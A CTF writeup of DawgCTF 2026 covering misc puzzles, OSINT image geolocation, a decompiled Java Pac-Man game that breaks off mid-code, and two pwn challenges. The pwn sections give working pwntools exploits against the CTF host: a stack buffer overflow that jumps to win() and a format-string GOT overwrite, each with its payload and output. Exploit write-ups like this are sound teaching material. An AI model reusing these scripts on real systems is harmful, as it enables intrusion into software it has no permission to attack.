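This competition was held from 2026/4/11 1:00 (JST) to 2026/4/13 1:00 (JST).
I took part as a member of a team again this time. We finished with 4400 points, 174th out of 674 teams.
Below are writeups for the challenges I solved myself.
Discord Challenge (Misc 25)
I joined the Discord server and looked at the messages in the #flag channel, where the flag was posted.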
DawgCTF{3nj0y_th3_c0mp3t1t10n!}
Hiding in Plain Sight (Misc 75)

The challenge description is as follows.
There's something strange about this image but I can't put my finger on it, any ideas?
The flag will be the name of the person or object you find, in the format DawgCTF{Chicken_Sandwich}
Something appears to be hidden in the image. When the image is shrunk, it looks like former President Obama.
DawgCTF{Barack_Obama}
crazy? i was crazy once! they locked me in a (Misc 150)
The same sentence is repeated, with more and more of it written in leet characters. I insert a line break after each sentence.
crazy? i was crazy once! they locked me in a room, a round room, a round rubber room, a round rubber room with rats, round rats, round rubber rats, round rubber rats with wheels, round wheels, round rubber wheels, round rubber wheels that go round and round and round, it drove me }pl cr4zy!
cr4zy? i w4s cr4zy once! they locked me in 4 room, 4 round room, 4 round rubber room, 4 round rubber room with r4ts, round r4ts, round rubber r4ts, round rubber r4ts with wheels, round wheels, round rubber wheels, round rubber wheels th4t go round 4nd round 4nd round, it drove me eh_ cr4zy!
cr4zy? i w4s cr4zy onc3! th3y lock3d m3 in 4 room, 4 round room, 4 round rubb3r room, 4 round rubb3r room with r4ts, round r4ts, round rubb3r r4ts, round rubb3r r4ts with wh33ls, round wh33ls, round rubb3r wh33ls, round rubb3r wh33ls th4t go round 4nd round 4nd round, it drov3 m3 dne cr4zy!
cr4zy? 1 w4s cr4zy onc3! th3y lock3d m3 1n 4 room, 4 round room, 4 round rubb3r room, 4 round rubb3r room w1th r4ts, round r4ts, round rubb3r r4ts, round rubb3r r4ts w1th wh33ls, round wh33ls, round rubb3r wh33ls, round rubb3r wh33ls th4t go round 4nd round 4nd round, 1t drov3 m3 s_e cr4zy!
cr4zy? 1 w4s cr4zy 0nc3! th3y l0ck3d m3 1n 4 r00m, 4 r0und r00m, 4 r0und rubb3r r00m, 4 r0und rubb3r r00m w1th r4ts, r0und r4ts, r0und rubb3r r4ts, r0und rubb3r r4ts w1th wh33ls, r0und wh33ls, r0und rubb3r wh33ls, r0und rubb3r wh33ls th4t g0 r0und 4nd r0und 4nd r0und, 1t dr0v3 m3 sae cr4zy!
cr4zy? 1 w45 cr4zy 0nc3! th3y l0ck3d m3 1n 4 r00m, 4 r0und r00m, 4 r0und rubb3r r00m, 4 r0und rubb3r r00m w1th r4t5, r0und r4t5, r0und rubb3r r4t5, r0und rubb3r r4t5 w1th wh33l5, r0und wh33l5, r0und rubb3r wh33l5, r0und rubb3r wh33l5 th4t g0 r0und 4nd r0und 4nd r0und, 1t dr0v3 m3 lp_ cr4zy!
cr4zy? 1 w45 cr4zy 0nc3! 7h3y l0ck3d m3 1n 4 r00m, 4 r0und r00m, 4 r0und rubb3r r00m, 4 r0und rubb3r r00m w17h r475, r0und r475, r0und rubb3r r475, r0und rubb3r r475 w17h wh33l5, r0und wh33l5, r0und rubb3r wh33l5, r0und rubb3r wh33l5 7h47 g0 r0und 4nd r0und 4nd r0und, 17 dr0v3 m3 efi cr4zy!
cr4zy? 1 w45 cr4zy 0nc3! 7h3y l0ck3d m3 1n 4 r00m, 4 r0und r00m, 4 r0und rubb3r r00m, 4 r0und rubb3r r00m w17h r475, r0und r475, r0und rubb3r r475, r0und rubb3r r475 w17h wh33l5, r0und wh33l5, r0und rubb3r wh33l5, r0und rubb3r wh33l5 7h47 60 r0und 4nd r0und 4nd r0und, 17 dr0v3 m3 l_y (r4zy!
(r4zy? 1 w45 (r4zy 0n(3! 7h3y l0(k3d m3 1n 4 r00m, 4 r0und r00m, 4 r0und rubb3r r00m, 4 r0und rubb3r r00m w17h r475, r0und r475, r0und rubb3r r475, r0und rubb3r r475 w17h wh33l5, r0und wh33l5, r0und rubb3r wh33l5, r0und rubb3r wh33l5 7h47 60 r0und 4nd r0und 4nd r0und, 17 dr0v3 m3 m_f (r42y!
(r42y? 1 w45 (r42y 0n(3! 7h3y l0(k3d m3 1n 4 r00m, 4 r0und r00m, 4 r0und rubb3r r00m, 4 r0und rubb3r r00m w17h r475, r0und r475, r0und rubb3r r475, r0und rubb3r r475 w17h wh33l5, r0und wh33l5, r0und rubb3r wh33l5, r0und rubb3r wh33l5 7h47 60 r0und 4nd r0und 4nd r0und, 17 dr0v3 m3 o_l (r42y!
(r42y? 1 w45 (r42y 0n(3! 7h3y l0(k3d m3 1n 4 r00m, 4 r0(_)nd r00m, 4 r0(_)nd r(_)883r r00m, 4 r0(_)nd r(_)883r r00m w17h r475, r0(_)nd r475, r0(_)nd r(_)883r r475, r0(_)nd r(_)883r r475 w17h wh33l5, r0(_)nd wh33l5, r0(_)nd r(_)883r wh33l5, r0(_)nd r(_)883r wh33l5 7h47 60 r0(_)nd 4nd r0(_)nd 4nd r0(_)nd, 17 dr0v3 m3 ort (r42y!
(r42y? 1 w45 (r42y 0n(3! 7h3y l0(k3|) m3 1n 4 r00m, 4 r0(_)n|) r00m, 4 r0(_)n|) r(_)883r r00m, 4 r0(_)n|) r(_)883r r00m w17h r475, r0(_)n|) r475, r0(_)n|) r(_)883r r475, r0(_)n|) r(_)883r r475 w17h wh33l5, r0(_)n|) wh33l5, r0(_)n|) r(_)883r wh33l5, r0(_)n|) r(_)883r wh33l5 7h47 60 r0(_)n|) 4n|) r0(_)n|) 4n|) r0(_)n|), 17 |)r0v3 m3 noc (|242y!
(|242y? 1 w45 (|242y 0n(3! 7h3y l0(k3|) m3 1n 4 |200m, 4 |20(_)n|) |200m, 4 |20(_)n|) |2(_)883|2 |200m, 4 |20(_)n|) |2(_)883|2 |200m w17h |2475, |20(_)n|) |2475, |20(_)n|) |2(_)883|2 |2475, |20(_)n|) |2(_)883|2 |2475 w17h wh33l5, |20(_)n|) wh33l5, |20(_)n|) |2(_)883|2 wh33l5, |20(_)n|) |2(_)883|2 wh33l5 7h47 60 |20(_)n|) 4n|) |20(_)n|) 4n|) |20(_)n|), 17 |)|20v3 m3 _ll (|242y!
(|242y? 1 w45 (|242y 0n(3! 7h3y l0(k3|) /\/\3 1n 4 |200/\/\, 4 |20(_)n|) |200/\/\, 4 |20(_)n|) |2(_)883|2 |200/\/\, 4 |20(_)n|) |2(_)883|2 |200/\/\ w17h |2475, |20(_)n|) |2475, |20(_)n|) |2(_)883|2 |2475, |20(_)n|) |2(_)883|2 |2475 w17h wh33l5, |20(_)n|) wh33l5, |20(_)n|) |2(_)883|2 wh33l5, |20(_)n|) |2(_)883|2 wh33l5 7h47 60 |20(_)n|) 4n|) |20(_)n|) 4n|) |20(_)n|), 17 |)|20v3 /\/\3 a_t (|242y!
(|242y? 1 w45 (|242y 0/\/(3! 7h3y l0(k3|) /\/\3 1/\/ 4 |200/\/\, 4 |20(_)/\/|) |200/\/\, 4 |20(_)/\/|) |2(_)883|2 |200/\/\, 4 |20(_)/\/|) |2(_)883|2 |200/\/\ w17h |2475, |20(_)/\/|) |2475, |20(_)/\/|) |2(_)883|2 |2475, |20(_)/\/|) |2(_)883|2 |2475 w17h wh33l5, |20(_)/\/|) wh33l5, |20(_)/\/|) |2(_)883|2 wh33l5, |20(_)/\/|) |2(_)883|2 wh33l5 7h47 60 |20(_)/\/|) 4/\/|) |20(_)/\/|) 4/\/|) |20(_)/\/|), 17 |)|20v3 /\/\3 sol (|242y!
(|242y? 1 \/\/45 (|242y 0/\/(3! 7h3y l0(k3|) /\/\3 1/\/ 4 |200/\/\, 4 |20(_)/\/|) |200/\/\, 4 |20(_)/\/|) |2(_)883|2 |200/\/\, 4 |20(_)/\/|) |2(_)883|2 |200/\/\ \/\/17h |2475, |20(_)/\/|) |2475, |20(_)/\/|) |2(_)883|2 |2475, |20(_)/\/|) |2(_)883|2 |2475 \/\/17h \/\/h33l5, |20(_)/\/|) \/\/h33l5, |20(_)/\/|) |2(_)883|2 \/\/h33l5, |20(_)/\/|) |2(_)883|2 \/\/h33l5 7h47 60 |20(_)/\/|) 4/\/|) |20(_)/\/|) 4/\/|) |20(_)/\/|), 17 |)|20v3 /\/\3 _ev (|242y!
(|242y? 1 \/\/45 (|242y 0/\/(3! 7|-|3y l0(k3|) /\/\3 1/\/ 4 |200/\/\, 4 |20(_)/\/|) |200/\/\, 4 |20(_)/\/|) |2(_)883|2 |200/\/\, 4 |20(_)/\/|) |2(_)883|2 |200/\/\ \/\/17|-| |2475, |20(_)/\/|) |2475, |20(_)/\/|) |2(_)883|2 |2475, |20(_)/\/|) |2(_)883|2 |2475 \/\/17|-| \/\/|-|33l5, |20(_)/\/|) \/\/|-|33l5, |20(_)/\/|) |2(_)883|2 \/\/|-|33l5, |20(_)/\/|) |2(_)883|2 \/\/|-|33l5 7|-|47 60 |20(_)/\/|) 4/\/|) |20(_)/\/|) 4/\/|) |20(_)/\/|), 17 |)|20v3 /\/\3 ah_ (|242\|!
(|242\|? 1 \/\/45 (|242\| 0/\/(3! 7|-|3\| l0(k3|) /\/\3 1/\/ 4 |200/\/\, 4 |20(_)/\/|) |200/\/\, 4 |20(_)/\/|) |2(_)883|2 |200/\/\, 4 |20(_)/\/|) |2(_)883|2 |200/\/\ \/\/17|-| |2475, |20(_)/\/|) |2475, |20(_)/\/|) |2(_)883|2 |2475, |20(_)/\/|) |2(_)883|2 |2475 \/\/17|-| \/\/|-|33l5, |20(_)/\/|) \/\/|-|33l5, |20(_)/\/|) |2(_)883|2 \/\/|-|33l5, |20(_)/\/|) |2(_)883|2 \/\/|-|33l5 7|-|47 60 |20(_)/\/|) 4/\/|) |20(_)/\/|) 4/\/|) |20(_)/\/|), 17 |)|20v3 /\/\3 i{F (|242\|!
(|242\|? 1 \/\/45 (|242\| 0/\/(3! 7|-|3\| |_0(k3|) /\/\3 1/\/ 4 |200/\/\, 4 |20(_)/\/|) |200/\/\, 4 |20(_)/\/|) |2(_)883|2 |200/\/\, 4 |20(_)/\/|) |2(_)883|2 |200/\/\ \/\/17|-| |2475, |20(_)/\/|) |2475, |20(_)/\/|) |2(_)883|2 |2475, |20(_)/\/|) |2(_)883|2 |2475 \/\/17|-| \/\/|-|33|_5, |20(_)/\/|) \/\/|-|33|_5, |20(_)/\/|) |2(_)883|2 \/\/|-|33|_5, |20(_)/\/|) |2(_)883|2 \/\/|-|33|_5 7|-|47 60 |20(_)/\/|) 4/\/|) |20(_)/\/|) 4/\/|) |20(_)/\/|), 17 |)|20v3 /\/\3 i{F (|242\|!
(|242\|? 1 \/\/45 (|242\| 0/\/(3! 7|-|3\| |_0(|<3|) /\/\3 1/\/ 4 |200/\/\, 4 |20(_)/\/|) |200/\/\, 4 |20(_)/\/|) |2(_)883|2 |200/\/\, 4 |20(_)/\/|) |2(_)883|2 |200/\/\ \/\/17|-| |2475, |20(_)/\/|) |2475, |20(_)/\/|) |2(_)883|2 |2475, |20(_)/\/|) |2(_)883|2 |2475 \/\/17|-| \/\/|-|33|_5, |20(_)/\/|) \/\/|-|33|_5, |20(_)/\/|) |2(_)883|2 \/\/|-|33|_5, |20(_)/\/|) |2(_)883|2 \/\/|-|33|_5 7|-|47 60 |20(_)/\/|) 4/\/|) |20(_)/\/|) 4/\/|) |20(_)/\/|), 17 |)|20v3 /\/\3 waD
Near the end of each sentence, between "drove me" and "crazy!", there is a fragment of the flag written in reverse order. The last sentence has its flag fragment at the very end, and the fragments are followed backwards from there. Note that the "TCg" part cannot be found and "i{F" is duplicated, so I adjust for that.
DawgCTF{i_have_lost_all_control_of_my_life_please_send_help}
HAZMAT (Misc 150)

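The challenge description is as follows.
I saw this CRAZY looking truck driving home. Can you figure out what it's carrying?
The flag format will be DawgCTF{PETROLLEUM_JELLY}
The number 1049 is visible on the back of the truck. Searching for "UN 1049", the AI overview showed the following.
UN 1049 is the four-digit UN number that identifies "compressed hydrogen (HYDROGEN, COMPRESSED)" under the international standards for the transport of dangerous goods. It is classified as a Class 2.1 flammable gas, and the hazards during transport and the safety standards for containers are specified in detail.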
DawgCTF{COMPRESSED_HYDROGEN}
HAZMAT III (Misc 150)

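The challenge description is as follows.
Apparently corporate says I have to deliver this really weird looking green vat somewhere,
can you help me figure out what number I should put on my placard when I transport this?
Your flag will look like DawgCTF{5661}.
Running an image search, the AI overview shows the following.
The product shown in this image is a heat transfer fluid sold under the UCARTHERM™ brand. It is widely used in the HVAC (heating, ventilation and air conditioning) industry and elsewhere as a water-based heat transfer medium where freeze protection is required.
・Product use: mainly used for freeze protection and as a heat transfer medium in air conditioning systems and industrial processes.
・Features: colored fluorescent yellow for leak detection.
・Safety: refer to the product's safety data sheet (MSDS).
Searching for "UCARTHERM MSDS" turns up the following PDF.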
https://www.chempoint.com/products/download?grade=30933&type=msds&srsltid=AfmBOooKBmcQNkkiAzve-n2Md17d0UH-QF3eajCgZlOcs_HlPgL8Tcfk
The number was listed under the "UN number" item in section 14. TRANSPORT INFORMATION.
UN 3082
DawgCTF{3082}
Hiding in Plain Sight 2 (Misc 175)

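The challenge description is as follows.
Something here seems a little off, can you figure out what?
The flag will be the name of the person or object you find, such as DawgCTF{Turkey_Sandwich}
Opening the image in StegSolve and viewing Red plane 1 revealed a person.

Searching with this image, the AI overview showed the following.
This image is a portrait of John Cena, known as a professional wrestler and actor.
・He has gone down in history as one of the greatest professional wrestlers in WWE.
・He is also famous for the phrase "U CAN'T SEE ME".
・He now also appears in many films as an actor.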
DawgCTF{John_Cena}
Gateway to the Turnpike (OSINT 50)

The challenge description is as follows.
They say all roads lead to Rome, but in this part of the mid-Atlantic, all roads lead to a very confusing set of gas stations. I snapped this photo on a road trip a while back. Do you think you could tell me the ZIP code of the place this was taken?
An image search turns up the following page.
https://www.facebook.com/MeanwhileinYork/posts/the-eternal-stoplight-breezewood-pabreezewood-pennsylvania-often-dubbed-the-town/1218005587032160/
It appears to be a view of Breezewood, Pennsylvania.
Looking around the McDonald's location in Google Maps, the spot is around here.
https://www.google.com/maps/place/McDonald's/@39.9992867,-78.2408521,3a,75y,85.21h,88.09t/data=!3m7!1e1!3m5!1spyrvntOZqMGZ5hx6vlm1JQ!2e0!6shttps:%2F%2Fstreetviewpixels-pa.googleapis.com%2Fv1%2Fthumbnail%3Fcb_client%3Dmaps_sv.tactile%26w%3D900%26h%3D600%26pitch%3D1.9091292061006016%26panoid%3DpyrvntOZqMGZ5hx6vlm1JQ%26yaw%3D85.21238973926883!7i16384!8i8192!4m6!3m5!1s0x89ca34ff312b02d9:0xe5201bd60aed9c2c!8m2!3d39.9985648!4d-78.2399713!16s%2Fg%2F1hc6dtt4t?entry=ttu&g_ep=EgoyMDI2MDQwOC4wIKXMDSoASAFQAw%3D%3D
The address is as follows.
123 S Breezewood Rd, Breezewood, PA 15533, United States
DawgCTF{15533}
The Temple of Doom (OSINT 50)

The challenge description is as follows.
I used to work at this crazy looking building. I've attached a picture of it, can you guess where it is?
If you can, the flag is the nickname the building has.
For instance, if the nickname was "The Dragon Building", the flag would be DawgCTF{The_Dragon_Building}.
An image search turns up the following page.
https://www.dcnewsnow.com/news/us-and-world/pyramid-for-sale-bids-start-at-70m-for-federal-building-in-california/
The name of the building is as follows.
Chet Holifield Federal Building
Its nickname is said to be "The Ziggurat Building".
DawgCTF{The_Ziggurat_Building}
Дмитрий-шесть (OSINT 50)

The challenge description is as follows.
My friend from Ukraine sent me this weird picture, he says that it's the key to a secret treasure room underground. Do you know where this picture was taken? The flag will be the official name of it, and should be 6 letters total, all capital letters.
An image search turns up the following page.
https://posfie.com/@54_98554/p/8E8jPhg
It appears to be a photo of Metro-2.
DawgCTF{METRO2}
Computer Repair II (OSINT 125)

The challenge description is as follows.
I just got another pic from the warehouse, not a lot to go on here, but could you figure out the screen size of this laptop?
The flag format will look like DawgCTF{18.9IN}.
Running an image search, the AI overview shows the following.
This is the DELL laptop "Latitude 5590".
・It is a business model with a 15.6-inch Full HD (1920 x 1080) display.
・It supports 8th-generation Intel Core processors and features a sturdy chassis.
・It has a keyboard with a numeric keypad.
・On the used market it sells from about 29,700 yen.
The screen size is 15.6 inches.
DawgCTF{15.6IN}
The Lookout's Legend (OSINT 125)

The challenge description is as follows.
High above the birthplace of the MTO, this mountain offers a view that spans six counties. What do the locals call this spot?
An image search turns up the following page.
https://worldradiomap.com/us-pa/altoona
The image resembles the photo in the following part of this page.
Wopsononock Lookout Coordinates: 40°34'03" N, 78°26'25" W ; Ground Elevation AMSL: 2253 ft (778.1 m) Wopsononock Lookout, northwest of Altoona, Pennsylvania is the location of several radio and television broadcast towers.
Looking up this latitude and longitude in Google Maps shows the following name.
Wopsy Lookout
DawgCTF{Wopsy_Lookout}
Stacking Flags (Pwn 100)
The attached source code is as follows.
/*gcc -fno-stack-protector -no-pie -z execstack -g -Wno-implicit-function-declaration in.c -o out*/
#include <stdio.h>
#include <stdlib.h>

void win() {
    FILE *fp;
    char flag[128];
    fp = fopen("flag.txt", "r");
    if (!fp) {
        puts("Could not open flag file.");
        fflush(stdout);
        exit(1);
    }
    fgets(flag, sizeof(flag), fp);
    puts(flag);
    fflush(stdout);
    fclose(fp);
    exit(0);
}

void vulnerable_function() {
    char buffer[64];
    gets(buffer);
}

int main() {
    setbuf(stdout, NULL);
    setbuf(stdin, NULL);
    setbuf(stderr, NULL);
    fflush(stdout);
    vulnerable_function();
    printf("win() is at: %p\n", win);
    printf("Better luck next time!\n");
    return 0;
}
A buffer overflow (BOF) can be used to call the win function.
$ gcc -fno-stack-protector -no-pie -z execstack -g -Wno-implicit-function-declaration Stacking_flags.c -o Stacking_flags
/usr/bin/ld: /tmp/ccCgfaaT.o: in function `vulnerable_function':
/mnt/hgfs/Shared/Stacking_flags.c:27:(.text+0xb8): 警告: the `gets' function is dangerous and should not be used.
$ ROPgadget --binary Stacking_flags | grep ": ret"
0x0000000000401016 : ret
0x0000000000401042 : ret 0x2f
0x0000000000401022 : retf 0x2f
#!/usr/bin/env python3
from pwn import *

# Connect to the remote service by default; pass any argument to run the local binary
if len(sys.argv) == 1:
    p = remote('nc.umbccd.net', 8921)
else:
    p = process('./Stacking_flags')

elf = ELF('./Stacking_flags')

ret_addr = 0x401016            # "ret" gadget from the ROPgadget output above
win_addr = elf.symbols['win']

payload = b'A' * 72
payload += p64(ret_addr)
payload += p64(win_addr)
print(payload)
p.sendline(payload)

data = p.recvline().decode().rstrip()
print(data)
The execution result is as follows.
[+] Opening connection to nc.umbccd.net on port 8921: Done
[*] '/mnt/hgfs/Shared/Stacking_flags'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX unknown - GNU_STACK missing
PIE: No PIE (0x400000)
Stack: Executable
RWX: Has RWX segments
Stripped: No
Debuginfo: Yes
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x16\x10@\x00\x00\x00\x00\x00\xa6\x11@\x00\x00\x00\x00\x00'
DawgCTF{$taching_br1cks}
[*] Closed connection to nc.umbccd.net port 8921
DawgCTF{$taching_br1cks}
Just Print It (Pwn 200)
The attached source is as follows.
/*gcc -fno-stack-protector -no-pie -z execstack -g -Wno-implicit-function-declaration in.c -o out*/
#include <stdio.h>
#include <stdlib.h>

void win() {
    FILE *fp;
    char flag[128];
    fp = fopen("flag.txt", "r");
    if (!fp) {
        puts("Error opening flag file.");
        fflush(stdout);
        exit(1);
    }
    fgets(flag, sizeof(flag), fp);
    printf("Flag: %s\n", flag);
    fflush(stdout);
    fclose(fp);
    exit(0);
}

int main() {
    char buffer[128];
    setbuf(stdout, NULL);
    setbuf(stdin, NULL);
    setbuf(stderr, NULL);
    fflush(stdout);
    fgets(buffer, sizeof(buffer), stdin);
    printf(buffer);
    puts("\nGoodbye!");
    return 0;
}
$ gcc -fno-stack-protector -no-pie -z execstack -g -Wno-implicit-function-declaration "Just_print_it .c" -o Just_print_it
$ ./Just_print_it
AAAA%p.%p.%p.%p.%p.%p.%p.%p
AAAA0x7f2ea3903963.0xfbad208b.0x7ffd27220d70.(nil).(nil).0x252e702541414141.0x2e70252e70252e70.0x70252e70252e7025
Goodbye!
There is a format string bug (FSB), and the output above shows that the offset is 6. Using this vulnerability, it is enough to overwrite the value at the puts function's address (its GOT entry) with the address of the win function.
#!/usr/bin/env python3
from pwn import *

context.arch = 'amd64'

# Connect to the remote service by default; pass any argument to run the local binary
if len(sys.argv) == 1:
    p = remote('nc.umbccd.net', 8925)
else:
    p = process('./Just_print_it')

elf = ELF('./Just_print_it')

puts_addr = elf.got['puts']
win_addr = elf.symbols['win']

# Write the address of win into the GOT entry of puts (format string offset 6)
writes_dict = {puts_addr: win_addr}
payload = fmtstr_payload(6, writes_dict)
print(payload)
p.sendline(payload)

data = p.recvrepeat(1).decode('utf-8', errors='ignore')
print(data)
The execution result is as follows.
[+] Opening connection to nc.umbccd.net on port 8925: Done
[*] '/mnt/hgfs/Shared/Just_print_it'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX unknown - GNU_STACK missing
PIE: No PIE (0x400000)
Stack: Executable
RWX: Has RWX segments
Stripped: No
Debuginfo: Yes
b'%150c%11$lln%123c%12$hhn%47c%13$hhnaaaab\x00@@\x00\x00\x00\x00\x00\x01@@\x00\x00\x00\x00\x00\x02@@\x00\x00\x00\x00\x00'
c aaaabFlag: DawgCTF{s3v3r_PWNed!}
[*] Closed connection to nc.umbccd.net port 8925
DawgCTF{s3v3r_PWNed!}
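The payload printed in the execution result above can be replayed offline to see exactly which bytes it stores. This is an added example, not part of the original writeup: it simulates only the %c and %n directives, takes the payload bytes and the offset 6 from this page, and the names simulate and read_qword are introduced here.

```python
import re
import struct

# Payload bytes copied from the solver output on this page.
PAYLOAD = (
    b'%150c%11$lln%123c%12$hhn%47c%13$hhnaaaab'
    b'\x00@@\x00\x00\x00\x00\x00'
    b'\x01@@\x00\x00\x00\x00\x00'
    b'\x02@@\x00\x00\x00\x00\x00'
)
BUFFER_ARG = 6  # offset found with the AAAA%p probe: argument 6 is the buffer start

# Number of bytes stored by %n for each length modifier (amd64).
N_WIDTH = {b'hh': 1, b'h': 2, b'': 4, b'l': 8, b'll': 8}
DIRECTIVE = re.compile(rb'%(?:(\d+)\$)?(\d*)(hh|h|ll|l)?([cn])')


def simulate(payload, buffer_arg=BUFFER_ARG):
    """Replay %c / %n as printf would; return (memory, printed).

    memory maps each address touched by %n to the byte stored there,
    printed is the number of characters printf would have emitted.
    """
    def stack_arg(index):
        # Positional argument `index` is the qword at this buffer offset.
        offset = 8 * (index - buffer_arg)
        if offset < 0 or offset + 8 > len(payload):
            raise ValueError(f'argument {index} is outside the payload')
        return struct.unpack_from('<Q', payload, offset)[0]

    fmt = payload.split(b'\x00', 1)[0]  # printf stops at the first NUL byte
    memory, printed, pos = {}, 0, 0
    while pos < len(fmt):
        m = DIRECTIVE.match(fmt, pos)
        if m is None:
            if fmt[pos:pos + 1] == b'%':
                raise ValueError(f'unsupported directive at offset {pos}')
            printed += 1  # literal character
            pos += 1
            continue
        index, width, length, conv = m.groups()
        if conv == b'c':
            # %Nc emits N characters (padding plus one character).
            printed += max(int(width or b'1'), 1)
        else:
            if index is None:
                raise ValueError('only positional %n is supported')
            # %n stores the running count, truncated to the modifier width.
            nbytes = N_WIDTH[length or b'']
            value = printed % (1 << (8 * nbytes))
            addr = stack_arg(int(index))
            for i, byte in enumerate(value.to_bytes(nbytes, 'little')):
                memory[addr + i] = byte
        pos = m.end()
    return memory, printed


def read_qword(memory, addr):
    """Little-endian 8-byte value at addr; KeyError if a byte was never written."""
    return int.from_bytes(bytes(memory[addr + i] for i in range(8)), 'little')


if __name__ == '__main__':
    mem, count = simulate(PAYLOAD)
    base = min(mem)
    print(f'{count} characters printed')
    print(f'qword at {base:#x} becomes {read_qword(mem, base):#x}')
```

The first %lln clears all eight bytes of the target and sets its low byte, and the two %hhn writes then patch the next two bytes, so the running count never has to reach the full address value.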
Cheater Cheater... (Reverse Engineering 200)
Decompile the jar with Bytecode Viewer.
import java.awt.Color;
import java.awt.Component;
import java.awt.Font;
import java.awt.Graphics;
import java.awt.Graphics2D;
import java.awt.Point;
import java.awt.event.ActionEvent;
import java.awt.event.ActionListener;
import java.awt.event.KeyAdapter;
import java.awt.event.KeyEvent;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Random;
import java.util.concurrent.Executors;
import java.util.concurrent.TimeUnit;
import javax.swing.InputMap;
import javax.swing.JFrame;
import javax.swing.JPanel;
import javax.swing.SwingUtilities;
import javax.swing.Timer;
import javax.swing.UIManager;
import javax.swing.UnsupportedLookAndFeelException;

public class SimplePacMan extends JPanel implements ActionListener {
    private static final int tileSize = 24;
    private static final int numTiles = 80;
    private static final int delay = 100;
    private Timer timer;
    private int pacX = 960;
    private int pacY = 960;
    private static final int topbar = 125;
    private int pacVelocityX = 0;
    private int pacVelocityY = 0;
    private int direction = 0;
    private int[][] maze;
    private boolean loser;
    private boolean winner;
    private int score;
    private final int[][] mazedirs = new int[][]{{0, -1}, {0, 1}, {-1, 0}, {1, 0}};
    private static JFrame frame;
    private JTextBasket barbecue2;
    private JTextBasket barbecue;
    private final String flag = "THIS IS NOT HOW YOU ARE SUPPOSED TO DO THE CHALLENGE. YOU CAN IF YOU WANT BUT IT'LL BE EASIER TO JUST CHEAT :) IF YOU DO REVERSE THIS, PLEASE DO A WRITE UP! I'M VERY CURIOUS TO HEAR THE PROCESS";
    protected static final String pacVelocityZ = "6Ach6HiD0JmCc1L+RwxDRzhW3sC1kS6XydgSuWVFpxVXRU8EjfuMxIMoIzMwK/ii";

    private static void runGUI() {
        JFrame.setDefaultLookAndFeelDecorated(true);
        frame = new JFrame("HacMan");
        UIManager.LookAndFeelInfo[] var0 = UIManager.getInstalledLookAndFeels();
        int var1 = var0.length;

        for(int var2 = 0; var2 < var1; ++var2) {
            UIManager.LookAndFeelInfo info = var0[var2];
            if ("GTK+".equals(info.getName())) {
                try {
                    UIManager.setLookAndFeel(info.getClassName());
                } catch (InstantiationException | IllegalAccessException | UnsupportedLookAndFeelException | ClassNotFoundException var5) {
                    var5.printStackTrace();
                }
                break;
            }
        }

        frame.setDefaultCloseOperation(3);
        SimplePacMan viewer = new SimplePacMan();
        frame.add(viewer);
        frame.pack();
        frame.setSize(1920, 2045);
        frame.setVisible(true);
    }

    public static void main(String[] args) {
        SwingUtilities.invokeLater(new Runnable() {
            public void run() {
                SimplePacMan.runGUI();
            }
        });
    }

    public SimplePacMan() {
        this.generateMaze();
        this.setSize(1920, 2045);
        this.setFocusable(true);
        this.addKeyListener(new KeyAdapter() {
            public void keyPressed(KeyEvent e) {
                switch (e.getKeyCode()) {
                    case 37:
                        SimplePacMan.this.pacVelocityX = -24;
                        SimplePacMan.this.pacVelocityY = 0;
                        SimplePacMan.this.direction = 2;
                        break;
                    case 38:
                        SimplePacMan.this.pacVelocityX = 0;
                        SimplePacMan.this.pacVelocityY = -24;
                        SimplePacMan.this.direction = 1;
                        break;
                    case 39:
                        SimplePacMan.this.pacVelocityX = 24;
                        SimplePacMan.this.pacVelocityY = 0;
                        SimplePacMan.this.direction = 0;
                        break;
                    case 40:
                        SimplePacMan.this.pacVelocityX = 0;
                        SimplePacMan.this.pacVelocityY = 24;
                        SimplePacMan.this.direction = 3;
                }
            }
        });
        this.barbecue = new JTextBasket();
        this.barbecue.setName("Cowabunga!");
        this.barbecue.setVisible(true);
        this.barbecue.firePropertyChange("delta", 2, 1);
        this.barbecue2 = new JTextBasket();
        this.barbecue2.setInputMap(2, (InputMap)null);
        this.barbecue2.setVisible(false);
        JTextBasket barbecue2 = new JTextBasket();
        barbecue2.setInputMap(2, (InputMap)null);
        barbecue2.setVisible(true);
        this.timer = new Timer(100, this);
        this.timer.start();
    }

    private void generateMaze() {
        this.maze = new int[80][80];
        ArrayList walls = new ArrayList();
        Random rand = new Random();
        this.barbecue = new JTextBasket();
        this.barbecue.setName("javacode");
        this.barbecue.setEnabled(false);
        this.add(this.barbecue);
        this.maze = this.prims(walls, rand.nextInt(80), rand.nextInt(80), this.maze, rand);
    }

    private int[][] prims(ArrayList walls, int startX, int startY, int[][] maze, Random rand) {
        maze[startX][startY] = 1;
        walls = this.addWalls(walls, startX, startY);

        while(true) {
            while(walls.size() > 0) {
                int windex = rand.nextInt(walls.size());
                Point randWall = (Point)walls.get(windex);
                Point[] near = this.passage(randWall);
                if (near.length == 1) {
                    maze[randWall.x][randWall.y] = 1;
                    int newX = randWall.x + near[0].x * -1;
                    int newY = randWall.y + near[0].y * -1;
                    if (newX < 0 || newX >= 80 || newY < 0 || newY >= 80) {
                        walls.remove(windex);
                        continue;
                    }

                    maze[newX][newY] = 1;
                    this.addWalls(walls, newX, newY);
                }

                walls.remove(windex);
            }

            return maze;
        }
    }

    private Point[] passage(Point wall) {
        return (Point[])Arrays.stream(this.mazedirs).filter((w) -> {
            return w[0] + wall.x >= 0 && w[0] + wall.x < 80 && w[1] + wall.y >= 0 && w[1] + wall.y < 80 && this.maze[w[0] + wall.x][w[1] + wall.y] == 1;
        }).map((w) -> {
            return new Point(w[0], w[1]);
        }).toArray((x$0) -> {
            return new Point[x$0];
        });
    }

    private ArrayList addWalls(ArrayList walls, int x, int y) {
        Arrays.stream(this.mazedirs).filter((w) -> {
            return w[0] + x >= 0 && w[0] + x < 80 && w[1] + y >= 0 && w[1] + y < 80 && this.maze[w[0] + x][w[1] + y] == 0;
        }).map((w) -> {
            return new Point(w[0] + x, w[1] + y);
        }).forEach(walls::add);
        return walls;
    }

    public void actionPerformed(ActionEvent e) {
        if (this.score >= 6942069) {
            this.winner = true;
            this.score = 6942069;
        } else {
            int mazeX = (this.pacX + this.pacVelocityX) / 24;
            int mazeY = (this.pacY + this.pacVelocityY) / 24;
